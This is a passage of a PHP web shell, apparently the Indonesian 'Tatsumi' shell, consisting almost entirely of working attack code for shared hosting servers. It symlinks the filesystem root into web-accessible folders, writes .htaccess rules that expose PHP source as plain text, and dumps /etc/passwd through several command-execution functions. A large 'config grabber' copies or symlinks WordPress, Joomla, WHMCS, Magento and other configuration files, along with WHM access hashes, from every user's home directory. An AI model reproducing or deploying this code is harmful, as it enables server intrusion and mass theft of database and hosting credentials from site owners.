  630. echo "<div id='menu'></br><center><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  631. echo '<center><b><a href="https://www.facebook.com/jembut.go.id">Coded By Arvan Apriyana</a></b><br>
  632. <form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  633. <br>
  634. <br>Save As: <input name="jnck" value="ojayakan.txt"><input name="ojaykan" type="submit" value="Eksekusi Gan"></form><br>';
  635. if($_POST['ojaykan']){
  636. rmdir("tatsumi_symlink404");mkdir("tatsumi_symlink404", 0777);
  637. $dir = $_POST['dir'];
  638. $jnck = $_POST['jnck'];
  639. system("ln -s ".$dir." tatsumi_symlink404/".$jnck);
  640. symlink($dir,"tatsumi_symlink404/".$jnck);
  641. $inija = fopen("tatsumi_symlink404/.htaccess", "w");
  642. fwrite($inija,"ReadmeName ".$jnck."
  643. Options Indexes FollowSymLinks
  644. DirectoryIndex ngeue.htm
  645. AddType text/plain .php
  646. AddHandler text/plain .php
  647. Satisfy Any
  648. ");
  649. echo'<a href="tatsumi_symlink404/" target="_blank">Klik Gan >:(</a>';
  650. }
  651. }elseif($_GET['bypass'] == 'passwd') {
  652.         echo '<div id="menu"><center></br><a href="?path=$path&bypass=disablefunc">Disable Functions</a></br><a href="?path=$path&bypass=passwd">Bypass /etc/passwd</a></br><a href="?path=$path&bypass=vhosts">Bypass Vhosts</a></div>';
  653.     echo '<br><br><center>Bypass etc/passw With:<br>
  654. <table style="width:50%">
  655.   <tr>
  656.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  657.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  658.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  659.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  660.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  661. </tr></table>Bypass User With : <table style="width:50%">
  662. <tr>
  663.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  664.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  665.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  666.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  667.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  668. </tr>
  669. </table><br>';
  670.  
  671.  
  672. if ($_POST['awkuser']) {
  673. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  674. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  675. echo "</textarea><br>";
  676. }
  677. if ($_POST['systuser']) {
  678. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  679. echo system("ls /var/mail");
  680. echo "</textarea><br>";
  681. }
  682. if ($_POST['passthuser']) {
  683. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  684. echo passthru("ls /var/mail");
  685. echo "</textarea><br>";
  686. }
  687. if ($_POST['exuser']) {
  688. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  689. echo exec("ls /var/mail");
  690. echo "</textarea><br>";
  691. }
  692. if ($_POST['shexuser']) {
  693. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  694. echo shell_exec("ls /var/mail");
  695. echo "</textarea><br>";
  696. }
  697. if($_POST['syst'])
  698. {
  699. echo"<textarea class='inputz' cols='65' rows='15'>";
  700. echo system("cat /etc/passwd");
  701. echo"</textarea><br><br><b></b><br>";
  702. }
  703. if($_POST['passth'])
  704. {
  705. echo"<textarea class='inputz' cols='65' rows='15'>";
  706. echo passthru("cat /etc/passwd");
  707. echo"</textarea><br><br><b></b><br>";
  708. }
  709. if($_POST['ex'])
  710. {
  711. echo"<textarea class='inputz' cols='65' rows='15'>";
  712. echo exec("cat /etc/passwd");
  713. echo"</textarea><br><br><b></b><br>";
  714. }
  715. if($_POST['shex'])
  716. {
  717. echo"<textarea class='inputz' cols='65' rows='15'>";
  718. echo shell_exec("cat /etc/passwd");
  719. echo"</textarea><br><br><b></b><br>";
  720. }
  721. echo '<center>';
  722. if($_POST['melex'])
  723. {
  724. echo"<textarea class='inputz' cols='65' rows='15'>";
  725. for($uid=0;$uid<60000;$uid++){
  726. $ara = posix_getpwuid($uid);
  727. if (!empty($ara)) {
  728. while (list ($key, $val) = each($ara)){
  729. print "$val:";
  730. }
  731. print "\n";
  732. }
  733. }
  734. echo"</textarea><br><br>";
  735. }
  736. } elseif($_GET['kill'] == 'self') {
  737.     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  738.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  739.         else
  740.             echo '<center>unlink failed!</center>';
  741. }
  742. elseif($_GET['symlink'] == 'server') {
  743. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  744. $d0mains = @file("/etc/named.conf");
  745. ##httaces
  746. if($d0mains){
  747. @mkdir("tatsumi_sym",0777);
  748. @chdir("tatsumi_sym");
  749. @exe("ln -s / root");
  750. $file3 = 'Options Indexes FollowSymLinks
  751. DirectoryIndex tatsumi.htm
  752. AddType text/plain .php
  753. AddHandler text/plain .php
  754. Satisfy Any';
  755. $fp3 = fopen('.htaccess','w');
  756. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  757. echo "<div id='menu'><center></br><a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></br></div>";
  758. echo "<br>
  759. <table align=center border=1 style='width:60%;border-color:#333333;'>
  760. <tr>
  761. <td align=center><font size=2>S. No.</font></td>
  762. <td align=center><font size=2>Domains</font></td>
  763. <td align=center><font size=2>Users</font></td>
  764. <td align=center><font size=2>Symlink</font></td>
  765. </tr>";
  766. $dcount = 1;
  767. foreach($d0mains as $d0main){
  768. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  769. flush();
  770. if(strlen(trim($domains[1][0])) > 2){
  771. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  772. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  773. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  774. <td>".$user['name']."</td>
  775. <td><a href='$full/tatsumi_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  776. flush();
  777. $dcount++;}}}
  778. echo "</table>";
  779. }else{
  780. $TEST=@file('/etc/passwd');
  781. if ($TEST){
  782. @mkdir("tatsumi_sym",0777);
  783. @chdir("tatsumi_sym");
  784. exe("ln -s / root");
  785. $file3 = 'Options Indexes FollowSymLinks
  786. DirectoryIndex tatsumi.htm
  787. AddType text/plain .php
  788. AddHandler text/plain .php
  789. Satisfy Any';
  790.  $fp3 = fopen('.htaccess','w');
  791.  $fw3 = fwrite($fp3,$file3);
  792.  @fclose($fp3);
  793.  echo "
  794.  <table align=center border=1><tr>
  795.  <td align=center><font size=3>S. No.</font></td>
  796.  <td align=center><font size=3>Users</font></td>
  797.  <td align=center><font size=3>Symlink</font></td></tr>";
  798.  $dcount = 1;
  799.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  800.  while(!feof($file)){
  801.  $s = fgets($file);
  802.  $matches = array();
  803.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  804.  $matches = str_replace("home/","",$matches[1]);
  805.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  806.  continue;
  807.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  808.  <td align=center><font class=txt>" . $matches . "</td>";
  809.  echo "<td align=center><font class=txt><a href=$full/tatsumi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  810.  $dcount++;}fclose($file);
  811.  echo "</table>";}else{if($os != "Windows"){@mkdir("tatsumi_sym",0777);@chdir("tatsumi_sym");@exe("ln -s / root");$file3 = '
  812. Options Indexes FollowSymLinks
  813. DirectoryIndex tatsumi.htm
  814. AddType text/plain .php
  815. AddHandler text/plain .php
  816. Satisfy Any
  817. ';
  818.  $fp3 = fopen('.htaccess','w');
  819.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  820.  echo "
  821.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  822.  <table align=center border=1><tr>
  823.  <td align=center><font size=3>ID</font></td>
  824.  <td align=center><font size=3>Users</font></td>
  825.  <td align=center><font size=3>Symlink</font></td></tr>";
  826.  $temp = "";$val1 = 0;$val2 = 1000;
  827.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  828.  if ($uid)$temp .= join(':',$uid)."\n";}
  829.  echo '<br/>';$temp = trim($temp);$file5 =
  830.  fopen("test.txt","w");
  831.  fputs($file5,$temp);
  832.  fclose($file5);$dcount = 1;$file =
  833.  fopen("test.txt", "r") or exit("Unable to open file!");
  834.  while(!feof($file)){$s = fgets($file);$matches = array();
  835.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  836.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  837.  continue;
  838.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  839.  <td align=center><font class=txt>" . $matches . "</td>";
  840.  echo "<td align=center><font class=txt><a href=$full/tatsumi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  841.  $dcount++;}
  842.  fclose($file);
  843.  echo "</table></div></center>";unlink("test.txt");
  844.  } else
  845.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  846.  }
  847.  }
  848. } elseif($_GET['config'] == 'grabber') {
  849.             if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  850. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  851. exit;
  852. }
  853.     if($_POST){ if($_POST['config'] == 'symvhosts') {
  854.         @mkdir("tatsumi_symvhosts", 0777);
  855. exe("ln -s / tatsumi_symvhosts/root");
  856. $htaccess="Options Indexes FollowSymLinks
  857. DirectoryIndex tatsumi.htm
  858. AddType text/plain .php
  859. AddHandler text/plain .php
  860. Satisfy Any";
  861. @file_put_contents("tatsumi_symvhosts/.htaccess",$htaccess);
  862.         $etc_passwd=$_POST['passwd'];
  863.    
  864.     $etc_passwd=explode("\n",$etc_passwd);
  865. foreach($etc_passwd as $passwd){
  866. $pawd=explode(":",$passwd);
  867. $user =$pawd[5];
  868. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  869. if (preg_match('/vhosts/i',$user)){
  870. exe("ln -s ".$user."/httpdocs/wp-config.php tatsumi_symvhosts/".$jembod."-Wordpress.txt");
  871. exe("ln -s ".$user."/httpdocs/configuration.php tatsumi_symvhosts/".$jembod."-Joomla.txt");
  872. exe("ln -s ".$user."/httpdocs/config/koneksi.php tatsumi_symvhosts/".$jembod."-Lokomedia.txt");
  873. exe("ln -s ".$user."/httpdocs/forum/config.php tatsumi_symvhosts/".$jembod."-phpBB.txt");
  874. exe("ln -s ".$user."/httpdocs/sites/default/settings.php tatsumi_symvhosts/".$jembod."-Drupal.txt");
  875. exe("ln -s ".$user."/httpdocs/config/settings.inc.php tatsumi_symvhosts/".$jembod."-PrestaShop.txt");
  876. exe("ln -s ".$user."/httpdocs/app/etc/local.xml tatsumi_symvhosts/".$jembod."-Magento.txt");
  877. exe("ln -s ".$user."/httpdocs/admin/config.php tatsumi_symvhosts/".$jembod."-OpenCart.txt");
  878. exe("ln -s ".$user."/httpdocs/application/config/database.php tatsumi_symvhosts/".$jembod."-Ellislab.txt");
  879. }}}
  880. if($_POST['config'] == 'symlink') {
  881. @mkdir("tatsumi_symconfig", 0777);
  882. @symlink("/","tatsumi_symconfig/root");
  883. $htaccess="Options Indexes FollowSymLinks
  884. DirectoryIndex tatsumi.htm
  885. AddType text/plain .php
  886. AddHandler text/plain .php
  887. Satisfy Any";
  888. @file_put_contents("tatsumi_symconfig/.htaccess",$htaccess);}
  889. if($_POST['config'] == '404') {
  890. @mkdir("tatsumi_sym404", 0777);
  891. @symlink("/","tatsumi_sym404/root");
  892. $htaccess="Options Indexes FollowSymLinks
  893. DirectoryIndex tatsumi.htm
  894. AddType text/plain .php
  895. AddHandler text/plain .php
  896. Satisfy Any
  897. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  898. IndexIgnore *.txt404
  899. RewriteEngine On
  900. RewriteCond %{REQUEST_FILENAME} ^.*tatsumi_sym404 [NC]
  901. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  902. @file_put_contents("tatsumi_sym404/.htaccess",$htaccess);
  903. }
  904. if($_POST['config'] == 'grab') {
  905.                         mkdir("tatsumi_configgrab", 0777);
  906.                         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  907.                         $htc = fopen("tatsumi_configgrab/.htaccess","w");
  908.                         fwrite($htc, $isi_htc);
  909. }
  910. $passwd = $_POST['passwd'];
  911.  
  912. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  913. foreach($user_config[1] as $user_tatsumi) {
  914. $grab_config = array(
  915. "/home/$user_tatsumi/.accesshash" => "WHM-accesshash",
  916. "/home/$user_tatsumi/public_html/config/koneksi.php" => "Lokomedia",
  917. "/home/$user_tatsumi/public_html/forum/config.php" => "phpBB",
  918. "/home/$user_tatsumi/public_html/sites/default/settings.php" => "Drupal",
  919. "/home/$user_tatsumi/public_html/config/settings.inc.php" => "PrestaShop",
  920. "/home/$user_tatsumi/public_html/app/etc/local.xml" => "Magento",
  921. "/home/$user_tatsumi/public_html/admin/config.php" => "OpenCart",
  922. "/home/$user_tatsumi/public_html/application/config/database.php" => "Ellislab",
  923. "/home/$user_tatsumi/public_html/vb/includes/config.php" => "Vbulletin",
  924. "/home/$user_tatsumi/public_html/includes/config.php" => "Vbulletin",
  925. "/home/$user_tatsumi/public_html/forum/includes/config.php" => "Vbulletin",
  926. "/home/$user_tatsumi/public_html/forums/includes/config.php" => "Vbulletin",
  927. "/home/$user_tatsumi/public_html/cc/includes/config.php" => "Vbulletin",
  928. "/home/$user_tatsumi/public_html/inc/config.php" => "MyBB",
  929. "/home/$user_tatsumi/public_html/includes/configure.php" => "OsCommerce",
  930. "/home/$user_tatsumi/public_html/shop/includes/configure.php" => "OsCommerce",
  931. "/home/$user_tatsumi/public_html/os/includes/configure.php" => "OsCommerce",
  932. "/home/$user_tatsumi/public_html/oscom/includes/configure.php" => "OsCommerce",
  933. "/home/$user_tatsumi/public_html/products/includes/configure.php" => "OsCommerce",
  934. "/home/$user_tatsumi/public_html/cart/includes/configure.php" => "OsCommerce",
  935. "/home/$user_tatsumi/public_html/inc/conf_global.php" => "IPB",
  936. "/home/$user_tatsumi/public_html/wp-config.php" => "Wordpress",
  937. "/home/$user_tatsumi/public_html/wp/test/wp-config.php" => "Wordpress",
  938. "/home/$user_tatsumi/public_html/blog/wp-config.php" => "Wordpress",
  939. "/home/$user_tatsumi/public_html/beta/wp-config.php" => "Wordpress",
  940. "/home/$user_tatsumi/public_html/portal/wp-config.php" => "Wordpress",
  941. "/home/$user_tatsumi/public_html/site/wp-config.php" => "Wordpress",
  942. "/home/$user_tatsumi/public_html/wp/wp-config.php" => "Wordpress",
  943. "/home/$user_tatsumi/public_html/WP/wp-config.php" => "Wordpress",
  944. "/home/$user_tatsumi/public_html/news/wp-config.php" => "Wordpress",
  945. "/home/$user_tatsumi/public_html/wordpress/wp-config.php" => "Wordpress",
  946. "/home/$user_tatsumi/public_html/test/wp-config.php" => "Wordpress",
  947. "/home/$user_tatsumi/public_html/demo/wp-config.php" => "Wordpress",
  948. "/home/$user_tatsumi/public_html/home/wp-config.php" => "Wordpress",
  949. "/home/$user_tatsumi/public_html/v1/wp-config.php" => "Wordpress",
  950. "/home/$user_tatsumi/public_html/v2/wp-config.php" => "Wordpress",
  951. "/home/$user_tatsumi/public_html/press/wp-config.php" => "Wordpress",
  952. "/home/$user_tatsumi/public_html/new/wp-config.php" => "Wordpress",
  953. "/home/$user_tatsumi/public_html/blogs/wp-config.php" => "Wordpress",
  954. "/home/$user_tatsumi/public_html/configuration.php" => "Joomla",
  955. "/home/$user_tatsumi/public_html/blog/configuration.php" => "Joomla",
  956. "/home/$user_tatsumi/public_html/submitticket.php" => "^WHMCS",
  957. "/home/$user_tatsumi/public_html/cms/configuration.php" => "Joomla",
  958. "/home/$user_tatsumi/public_html/beta/configuration.php" => "Joomla",
  959. "/home/$user_tatsumi/public_html/portal/configuration.php" => "Joomla",
  960. "/home/$user_tatsumi/public_html/site/configuration.php" => "Joomla",
  961. "/home/$user_tatsumi/public_html/main/configuration.php" => "Joomla",
  962. "/home/$user_tatsumi/public_html/home/configuration.php" => "Joomla",
  963. "/home/$user_tatsumi/public_html/demo/configuration.php" => "Joomla",
  964. "/home/$user_tatsumi/public_html/test/configuration.php" => "Joomla",
  965. "/home/$user_tatsumi/public_html/v1/configuration.php" => "Joomla",
  966. "/home/$user_tatsumi/public_html/v2/configuration.php" => "Joomla",
  967. "/home/$user_tatsumi/public_html/joomla/configuration.php" => "Joomla",
  968. "/home/$user_tatsumi/public_html/new/configuration.php" => "Joomla",
  969. "/home/$user_tatsumi/public_html/WHMCS/submitticket.php" => "WHMCS",
  970. "/home/$user_tatsumi/public_html/whmcs1/submitticket.php" => "WHMCS",
  971. "/home/$user_tatsumi/public_html/Whmcs/submitticket.php" => "WHMCS",
  972. "/home/$user_tatsumi/public_html/whmcs/submitticket.php" => "WHMCS",
  973. "/home/$user_tatsumi/public_html/whmcs/submitticket.php" => "WHMCS",
  974. "/home/$user_tatsumi/public_html/WHMC/submitticket.php" => "WHMCS",
  975. "/home/$user_tatsumi/public_html/Whmc/submitticket.php" => "WHMCS",
  976. "/home/$user_tatsumi/public_html/whmc/submitticket.php" => "WHMCS",
  977. "/home/$user_tatsumi/public_html/WHM/submitticket.php" => "WHMCS",
  978. "/home/$user_tatsumi/public_html/Whm/submitticket.php" => "WHMCS",
  979. "/home/$user_tatsumi/public_html/whm/submitticket.php" => "WHMCS",
  980. "/home/$user_tatsumi/public_html/HOST/submitticket.php" => "WHMCS",
  981. "/home/$user_tatsumi/public_html/Host/submitticket.php" => "WHMCS",
  982. "/home/$user_tatsumi/public_html/host/submitticket.php" => "WHMCS",
  983. "/home/$user_tatsumi/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  984. "/home/$user_tatsumi/public_html/Supportes/submitticket.php" => "WHMCS",
  985. "/home/$user_tatsumi/public_html/supportes/submitticket.php" => "WHMCS",
  986. "/home/$user_tatsumi/public_html/domains/submitticket.php" => "WHMCS",
  987. "/home/$user_tatsumi/public_html/domain/submitticket.php" => "WHMCS",
  988. "/home/$user_tatsumi/public_html/Hosting/submitticket.php" => "WHMCS",
  989. "/home/$user_tatsumi/public_html/HOSTING/submitticket.php" => "WHMCS",
  990. "/home/$user_tatsumi/public_html/hosting/submitticket.php" => "WHMCS",
  991. "/home/$user_tatsumi/public_html/CART/submitticket.php" => "WHMCS",
  992. "/home/$user_tatsumi/public_html/Cart/submitticket.php" => "WHMCS",
  993. "/home/$user_tatsumi/public_html/cart/submitticket.php" => "WHMCS",
  994. "/home/$user_tatsumi/public_html/ORDER/submitticket.php" => "WHMCS",
  995. "/home/$user_tatsumi/public_html/Order/submitticket.php" => "WHMCS",
  996. "/home/$user_tatsumi/public_html/order/submitticket.php" => "WHMCS",
  997. "/home/$user_tatsumi/public_html/CLIENT/submitticket.php" => "WHMCS",
  998. "/home/$user_tatsumi/public_html/Client/submitticket.php" => "WHMCS",
  999. "/home/$user_tatsumi/public_html/client/submitticket.php" => "WHMCS",
  1000. "/home/$user_tatsumi/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1001. "/home/$user_tatsumi/public_html/Clientarea/submitticket.php" => "WHMCS",
  1002. "/home/$user_tatsumi/public_html/clientarea/submitticket.php" => "WHMCS",
  1003. "/home/$user_tatsumi/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1004. "/home/$user_tatsumi/public_html/Support/submitticket.php" => "WHMCS",
  1005. "/home/$user_tatsumi/public_html/support/submitticket.php" => "WHMCS",
  1006. "/home/$user_tatsumi/public_html/BILLING/submitticket.php" => "WHMCS",
  1007. "/home/$user_tatsumi/public_html/Billing/submitticket.php" => "WHMCS",
  1008. "/home/$user_tatsumi/public_html/billing/submitticket.php" => "WHMCS",
  1009. "/home/$user_tatsumi/public_html/BUY/submitticket.php" => "WHMCS",
  1010. "/home/$user_tatsumi/public_html/Buy/submitticket.php" => "WHMCS",
  1011. "/home/$user_tatsumi/public_html/buy/submitticket.php" => "WHMCS",
  1012. "/home/$user_tatsumi/public_html/MANAGE/submitticket.php" => "WHMCS",
  1013. "/home/$user_tatsumi/public_html/Manage/submitticket.php" => "WHMCS",
  1014. "/home/$user_tatsumi/public_html/manage/submitticket.php" => "WHMCS",
  1015. "/home/$user_tatsumi/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1016. "/home/$user_tatsumi/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1017. "/home/$user_tatsumi/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1018. "/home/$user_tatsumi/public_html/clientsupport/submitticket.php" => "WHMCS",
  1019. "/home/$user_tatsumi/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1020. "/home/$user_tatsumi/public_html/Checkout/submitticket.php" => "WHMCS",
  1021. "/home/$user_tatsumi/public_html/checkout/submitticket.php" => "WHMCS",
  1022. "/home/$user_tatsumi/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1023. "/home/$user_tatsumi/public_html/Billings/submitticket.php" => "WHMCS",
  1024. "/home/$user_tatsumi/public_html/billings/submitticket.php" => "WHMCS",
  1025. "/home/$user_tatsumi/public_html/BASKET/submitticket.php" => "WHMCS",
  1026. "/home/$user_tatsumi/public_html/Basket/submitticket.php" => "WHMCS",
  1027. "/home/$user_tatsumi/public_html/basket/submitticket.php" => "WHMCS",
  1028. "/home/$user_tatsumi/public_html/SECURE/submitticket.php" => "WHMCS",
  1029. "/home/$user_tatsumi/public_html/Secure/submitticket.php" => "WHMCS",
  1030. "/home/$user_tatsumi/public_html/secure/submitticket.php" => "WHMCS",
  1031. "/home/$user_tatsumi/public_html/SALES/submitticket.php" => "WHMCS",
  1032. "/home/$user_tatsumi/public_html/Sales/submitticket.php" => "WHMCS",
  1033. "/home/$user_tatsumi/public_html/sales/submitticket.php" => "WHMCS",
  1034. "/home/$user_tatsumi/public_html/BILL/submitticket.php" => "WHMCS",
  1035. "/home/$user_tatsumi/public_html/Bill/submitticket.php" => "WHMCS",
  1036. "/home/$user_tatsumi/public_html/bill/submitticket.php" => "WHMCS",
  1037. "/home/$user_tatsumi/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1038. "/home/$user_tatsumi/public_html/Purchase/submitticket.php" => "WHMCS",
  1039. "/home/$user_tatsumi/public_html/purchase/submitticket.php" => "WHMCS",
  1040. "/home/$user_tatsumi/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1041. "/home/$user_tatsumi/public_html/Account/submitticket.php" => "WHMCS",
  1042. "/home/$user_tatsumi/public_html/account/submitticket.php" => "WHMCS",
  1043. "/home/$user_tatsumi/public_html/USER/submitticket.php" => "WHMCS",
  1044. "/home/$user_tatsumi/public_html/User/submitticket.php" => "WHMCS",
  1045. "/home/$user_tatsumi/public_html/user/submitticket.php" => "WHMCS",
  1046. "/home/$user_tatsumi/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1047. "/home/$user_tatsumi/public_html/Clients/submitticket.php" => "WHMCS",
  1048. "/home/$user_tatsumi/public_html/clients/submitticket.php" => "WHMCS",
  1049. "/home/$user_tatsumi/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1050. "/home/$user_tatsumi/public_html/Billings/submitticket.php" => "WHMCS",
  1051. "/home/$user_tatsumi/public_html/billings/submitticket.php" => "WHMCS",
  1052. "/home/$user_tatsumi/public_html/MY/submitticket.php" => "WHMCS",
  1053. "/home/$user_tatsumi/public_html/My/submitticket.php" => "WHMCS",
  1054. "/home/$user_tatsumi/public_html/my/submitticket.php" => "WHMCS",
  1055. "/home/$user_tatsumi/public_html/secure/whm/submitticket.php" => "WHMCS",
  1056. "/home/$user_tatsumi/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1057. "/home/$user_tatsumi/public_html/panel/submitticket.php" => "WHMCS",
  1058. "/home/$user_tatsumi/public_html/clientes/submitticket.php" => "WHMCS",
  1059. "/home/$user_tatsumi/public_html/cliente/submitticket.php" => "WHMCS",
  1060. "/home/$user_tatsumi/public_html/support/order/submitticket.php" => "WHMCS",
  1061. "/home/$user_tatsumi/public_html/bb-config.php" => "BoxBilling",
  1062. "/home/$user_tatsumi/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1063. "/home/$user_tatsumi/public_html/box/bb-config.php" => "BoxBilling",
  1064. "/home/$user_tatsumi/public_html/host/bb-config.php" => "BoxBilling",
  1065. "/home/$user_tatsumi/public_html/Host/bb-config.php" => "BoxBilling",
  1066. "/home/$user_tatsumi/public_html/supportes/bb-config.php" => "BoxBilling",
  1067. "/home/$user_tatsumi/public_html/support/bb-config.php" => "BoxBilling",
  1068. "/home/$user_tatsumi/public_html/hosting/bb-config.php" => "BoxBilling",
  1069. "/home/$user_tatsumi/public_html/cart/bb-config.php" => "BoxBilling",
  1070. "/home/$user_tatsumi/public_html/order/bb-config.php" => "BoxBilling",
  1071. "/home/$user_tatsumi/public_html/client/bb-config.php" => "BoxBilling",
  1072. "/home/$user_tatsumi/public_html/clients/bb-config.php" => "BoxBilling",
  1073. "/home/$user_tatsumi/public_html/cliente/bb-config.php" => "BoxBilling",
  1074. "/home/$user_tatsumi/public_html/clientes/bb-config.php" => "BoxBilling",
  1075. "/home/$user_tatsumi/public_html/billing/bb-config.php" => "BoxBilling",
  1076. "/home/$user_tatsumi/public_html/billings/bb-config.php" => "BoxBilling",
  1077. "/home/$user_tatsumi/public_html/my/bb-config.php" => "BoxBilling",
  1078. "/home/$user_tatsumi/public_html/secure/bb-config.php" => "BoxBilling",
  1079. "/home/$user_tatsumi/public_html/support/order/bb-config.php" => "BoxBilling",
  1080. "/home/$user_tatsumi/public_html/includes/dist-configure.php" => "Zencart",
  1081. "/home/$user_tatsumi/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1082. "/home/$user_tatsumi/public_html/products/includes/dist-configure.php" => "Zencart",
  1083. "/home/$user_tatsumi/public_html/cart/includes/dist-configure.php" => "Zencart",
  1084. "/home/$user_tatsumi/public_html/shop/includes/dist-configure.php" => "Zencart",
  1085. "/home/$user_tatsumi/public_html/includes/iso4217.php" => "Hostbills",
  1086. "/home/$user_tatsumi/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1087. "/home/$user_tatsumi/public_html/host/includes/iso4217.php" => "Hostbills",
  1088. "/home/$user_tatsumi/public_html/Host/includes/iso4217.php" => "Hostbills",
  1089. "/home/$user_tatsumi/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1090. "/home/$user_tatsumi/public_html/support/includes/iso4217.php" => "Hostbills",
  1091. "/home/$user_tatsumi/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1092. "/home/$user_tatsumi/public_html/cart/includes/iso4217.php" => "Hostbills",
  1093. "/home/$user_tatsumi/public_html/order/includes/iso4217.php" => "Hostbills",
  1094. "/home/$user_tatsumi/public_html/client/includes/iso4217.php" => "Hostbills",
  1095. "/home/$user_tatsumi/public_html/clients/includes/iso4217.php" => "Hostbills",
  1096. "/home/$user_tatsumi/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1097. "/home/$user_tatsumi/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1098. "/home/$user_tatsumi/public_html/billing/includes/iso4217.php" => "Hostbills",
  1099. "/home/$user_tatsumi/public_html/billings/includes/iso4217.php" => "Hostbills",
  1100. "/home/$user_tatsumi/public_html/my/includes/iso4217.php" => "Hostbills",
  1101. "/home/$user_tatsumi/public_html/secure/includes/iso4217.php" => "Hostbills",
  1102. "/home/$user_tatsumi/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1103. );  
  1104.  
  1105. foreach($grab_config as $config => $nama_config) {
  1106.     if($_POST['config'] == 'grab') {
  1107. $ambil_config = file_get_contents($config);
  1108. if($ambil_config == '') {
  1109. } else {
  1110. $file_config = fopen("tatsumi_configgrab/$user_tatsumi-$nama_config.txt","w");
  1111. fputs($file_config,$ambil_config);
  1112. }
  1113. }
  1114. if($_POST['config'] == 'symlink') {
  1115. @symlink($config,"tatsumi_Symconfig/".$user_tatsumi."-".$nama_config.".txt");
  1116. }
  1117. if($_POST['config'] == '404') {
  1118. $sym404=symlink($config,"tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt");
  1119. if($sym404){
  1120.     @mkdir("tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404", 0777);
